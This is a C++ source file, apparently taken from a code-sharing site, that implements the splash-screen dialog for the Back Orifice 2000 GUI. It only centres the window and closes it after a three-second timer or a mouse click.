Splash.cpp
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:3k
源码类别:

远程控制编程

开发平台:

WINDOWS

  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  3.     This program is free software; you can redistribute it and/or modify
  4.     it under the terms of the GNU General Public License as published by
  5.     the Free Software Foundation; either version 2 of the License, or
  6.     (at your option) any later version.
  7.     This program is distributed in the hope that it will be useful,
  8.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  9.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  10.     GNU General Public License for more details.
  11.     You should have received a copy of the GNU General Public License
  12.     along with this program; if not, write to the Free Software
  13.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  14. The author of this program may be contacted at dildog@l0pht.com. */
  15. // Splash.cpp : implementation file
  16. //
  17. #include "stdafx.h"
  18. #include "bo2kgui.h"
  19. #include "splash.h"
  20. #ifdef _DEBUG
  21. #define new DEBUG_NEW
  22. #undef THIS_FILE
  23. static char THIS_FILE[] = __FILE__;
  24. #endif
  25. /////////////////////////////////////////////////////////////////////////////
  26. // CSplash dialog
  27. CSplash::CSplash(CWnd* pParent /*=NULL*/)
  28. : CDialog(CSplash::IDD, pParent)
  29. {
  30. //{{AFX_DATA_INIT(CSplash)
  31. // NOTE: the ClassWizard will add member initialization here
  32. //}}AFX_DATA_INIT
  33. }
  34. void CSplash::DoDataExchange(CDataExchange* pDX)
  35. {
  36. CDialog::DoDataExchange(pDX);
  37. //{{AFX_DATA_MAP(CSplash)
  38. // NOTE: the ClassWizard will add DDX and DDV calls here
  39. //}}AFX_DATA_MAP
  40. }
  41. BEGIN_MESSAGE_MAP(CSplash, CDialog)
  42. //{{AFX_MSG_MAP(CSplash)
  43. ON_WM_TIMER()
  44. ON_WM_LBUTTONDOWN()
  45. ON_WM_RBUTTONDOWN()
  46. //}}AFX_MSG_MAP
  47. END_MESSAGE_MAP()
  48. /////////////////////////////////////////////////////////////////////////////
  49. // CSplash message handlers
  50. BOOL CSplash::OnInitDialog() 
  51. {
  52. CDialog::OnInitDialog();
  53. RECT r;
  54. GetDlgItem(IDC_SPLASH)->GetClientRect(&r);
  55. MoveWindow((GetSystemMetrics(SM_CXSCREEN)-r.right)/2,
  56. (GetSystemMetrics(SM_CYSCREEN)-r.bottom)/2,
  57. (r.right-r.left),(r.bottom-r.top),TRUE);
  58. SetTimer(69,3000,NULL);
  59. return TRUE;  // return TRUE unless you set the focus to a control
  60.               // EXCEPTION: OCX Property Pages should return FALSE
  61. }
  62. void CSplash::OnTimer(UINT nIDEvent) 
  63. {
  64. if(nIDEvent==69) {
  65. EndDialog(0);
  66. }
  67. CDialog::OnTimer(nIDEvent);
  68. }
  69. void CSplash::OnLButtonDown(UINT nFlags, CPoint point) 
  70. {
  71. EndDialog(0);
  72. CDialog::OnLButtonDown(nFlags, point);
  73. }
  74. void CSplash::OnRButtonDown(UINT nFlags, CPoint point) 
  75. {
  76. EndDialog(0);
  77. CDialog::OnRButtonDown(nFlags, point);
  78. }